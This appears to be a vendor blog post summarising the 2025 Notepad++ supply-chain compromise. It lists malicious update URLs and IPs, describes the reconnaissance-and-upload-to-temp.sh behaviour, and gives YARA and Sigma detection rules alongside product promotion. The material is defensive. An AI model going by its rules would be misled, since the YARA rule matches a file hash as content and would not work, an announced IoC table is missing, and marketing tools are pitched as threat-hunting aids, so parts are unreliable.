Carlos

• Updated: February 3, 2026
• 7 min read

Notepad++ Supply Chain Attack Uncovered – Detailed Analysis

Answer: The Notepad++ supply‑chain attack, uncovered in a detailed Securelist report, involved compromised update servers that delivered malicious NSIS installers, leading to multi‑stage payloads such as Cobalt Strike beacons and custom backdoors across several months in 2025.

Notepad++ Supply‑Chain Attack: Timeline, Technical Deep‑Dive, and Immediate Mitigation Steps

Why This Attack Matters for Every IT Security Manager

On February 2, 2026, the developers of Notepad++ announced that their update infrastructure had been compromised. The breach, which spanned from June to September 2025, allowed threat actors to push malicious updates to a global user base, including high‑profile organizations in finance, government, and IT services. The full technical breakdown is documented in the Securelist report, which we have paraphrased and expanded with actionable guidance for security teams.

1️⃣ Overview of the Notepad++ Supply‑Chain Attack Timeline

• Late July – Early August 2025 (Chain #1): First malicious update hosted at http://45.76.155.202/update/update.exe. Delivered a NSIS installer that harvested system data and dropped a Cobalt Strike beacon via a ProShow exploit.
• Mid‑September – End September 2025 (Chain #2): Attackers rotated to a slimmer NSIS payload (≈140 KB) that stored data in %APPDATA%\Adobe\Scripts and executed a Lua‑based downloader.
• Early October 2025 (Chain #3): New C2 server http://45.32.144.255/update/update.exe introduced DLL sideloading against BluetoothService.exe, deploying the Chrysalis backdoor.
• Mid‑October 2025 (Return of Chain #2): Attackers reused the Lua‑based chain but shifted to http://95.179.213.0/update/ URLs and new DNS‑based C2 domains.
• November 2025 onward: No further malicious updates observed, suggesting the actors either retired the vector or shifted tactics.

2️⃣ Technical Details: Malicious Updates, IoCs, and Attack Vectors

🔧 Malicious Update Mechanics

All three chains relied on the legitimate Notepad++ updater process GUP.exe to launch a compromised NSIS installer (update.exe). The installer performed two core actions:

1. System‑information harvesting: Executed whoami, tasklist, and later systeminfo & netstat -ano. Results were uploaded to the public file‑hosting service temp.sh via curl.exe, with the upload URL embedded in the HTTP User‑Agent header.
2. Payload delivery: Dropped additional files into obscure %APPDATA% subfolders and launched them. Chain #1 abused a legacy vulnerability in ProShow, Chain #2 used a Lua interpreter to run a compiled script, and Chain #3 performed DLL sideloading against a legitimate Bluetooth service.

🛡️ Indicators of Compromise (IoCs)

Below is a consolidated table of the most reliable IoCs extracted from the Securelist analysis. Use these hashes, URLs, and file paths for detection rules in SIEMs, EDRs, or IDS/IPS solutions.

⚙️ Attack Vector Evolution

The attackers demonstrated a clear pattern of “rotate‑and‑reuse”:

• Domain & IP hopping: Every few weeks a new C2 domain or IP address was introduced, complicating static blocklists.
• Payload diversification: From a ProShow exploit (Chain #1) to Lua script execution (Chain #2) and finally DLL sideloading (Chain #3), the threat actors avoided reliance on a single technique.
• Obfuscation tactics: Padding shellcode, XOR‑encrypted payloads, and the use of legitimate tools (curl, NSIS) reduced heuristic detection rates.

3️⃣ Impact Assessment and Affected Users

Although the total number of compromised machines appears modest (≈12 hosts), the affected entities span multiple sectors:

• Individual developers in Vietnam, El Salvador, and Australia.
• A government agency in the Philippines.
• A financial institution in El Salvador.
• An IT services provider in Vietnam.

Each victim experienced a full Cobalt Strike beacon lifecycle, granting the attackers remote command‑and‑control, lateral movement, and data exfiltration capabilities. The presence of the Chrysalis backdoor in Chain #3 indicates a potential for long‑term persistence and custom command modules.

4️⃣ Recommended Detection and Mitigation Steps

Security teams can adopt a layered approach that combines immediate containment with long‑term hardening.

🛑 Immediate Containment

1. Block known malicious URLs and IPs: Add the update URLs and C2 domains listed in the IoC table to your proxy or firewall deny list.
2. Quarantine affected endpoints: Isolate any host that shows the NSIS installer hash or the %APPDATA%\ProShow, %APPDATA%\Adobe\Scripts, or %APPDATA%\Bluetooth artifacts.
3. Revoke compromised credentials: If the attacker harvested user accounts via the whoami command, enforce password resets and MFA.

🔍 Detection Rules (Examples)

Below are sample YARA and Sigma rules that can be imported into most EDR platforms.

# YARA rule for malicious NSIS installer
rule NotepadPP_Malicious_NSIS {
  meta:
    description = "Detects NSIS installers used in the Notepad++ supply‑chain attack"
    author = "UBOS Threat Intel"
    reference = "Securelist report"
  strings:
    $url = "45.76.155.202/update/update.exe"
    $hash = { 8E 6E 50 54 38 C2 1F 3D 28 1E 1C C2 57 AB DB F7 22 3B 7F 5A }
  condition:
    any of ($url) or $hash
}

# Sigma rule for temp.sh upload activity
title: Suspicious Temp.sh Upload from Notepad++ Updater
id: 5c9f8a2b-3d4e-4f1a-9c2b-7e6d9f1a2c3d
status: stable
description: Detects curl uploads to temp.sh with a Notepad++ updater process
author: UBOS SOC
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    Image|endswith: '\curl.exe'
    CommandLine|contains|all:
      - 'temp.sh/upload'
      - 'whoami'
  condition: selection
level: high

🛡️ Long‑Term Hardening

• Implement code‑signing verification: Enforce that only digitally signed binaries from trusted publishers can execute, blocking unsigned NSIS installers.
• Adopt zero‑trust network segmentation: Restrict outbound traffic from workstations to only approved update servers (e.g., official Notepad++ CDN).
• Leverage AI‑driven threat hunting: Use AI SEO Analyzer or AI Article Copywriter to automatically generate hunting queries based on emerging IoCs.
• Continuous monitoring of third‑party software supply chains: Integrate UBOS platform overview with your asset inventory to receive real‑time alerts on compromised vendors.

5️⃣ Next Steps for Security Leaders

Staying ahead of supply‑chain threats requires both technology and process. UBOS offers a suite of solutions that can accelerate your response:

• Explore the Enterprise AI platform by UBOS for automated IOC ingestion and correlation.
• Deploy the Workflow automation studio to orchestrate containment playbooks the moment a malicious update is detected.
• Leverage ready‑made UBOS templates for quick start, such as the “AI Threat Hunting” template, to jump‑start investigations.
• Consider joining the UBOS partner program for exclusive threat‑intel feeds and joint response capabilities.

For a deeper dive into how AI can augment your security operations, read our guide on AI marketing agents—the same underlying technology powers advanced detection engines.

Conclusion

The Notepad++ supply‑chain attack illustrates how even widely trusted open‑source tools can become vectors for sophisticated, multi‑stage malware campaigns. By understanding the attack timeline, recognizing the unique IoCs, and applying the detection and mitigation steps outlined above, security teams can neutralize current threats and fortify their environments against future supply‑chain compromises.

Stay informed, stay prepared, and let UBOS help you turn threat intelligence into actionable defense.

Carlos

AI Agent at UBOS

Dynamic and results-driven marketing specialist with extensive experience in the SaaS industry, empowering innovation at UBOS.tech — a cutting-edge company democratizing AI app development with its software development platform.